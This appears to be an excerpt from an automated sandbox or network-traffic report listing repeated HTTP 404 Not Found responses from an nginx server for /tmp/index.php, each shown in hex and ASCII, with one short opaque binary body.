      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 12 Oct 2024 18:07:49 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 12 Oct 2024 18:07:52 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 12 Oct 2024 18:07:55 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 12 Oct 2024 18:07:56 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 12 Oct 2024 18:07:59 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 12 Oct 2024 18:08:01 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 12 Oct 2024 18:08:02 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 12 Oct 2024 18:08:04 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 00 00 d8 80 d7 bd 9d d9 a1 98 be 23 cd c5 88 81 99 8b 5c 36 59 39 08 a5 6c 5f b5 ac 17 bd cf b4 fe 6d 9f 3d d4 a1 72 0a 41 c2 8f 97 cb Data Ascii: #\6Y9l_m=rA
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 12 Oct 2024 18:08:07 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 12 Oct 2024 18:08:09 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 12 Oct 2024 18:08:10 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 12 Oct 2024 18:08:12 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 12 Oct 2024 18:08:13 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 12 Oct 2024 18:08:13 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 12 Oct 2024 18:08:13 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
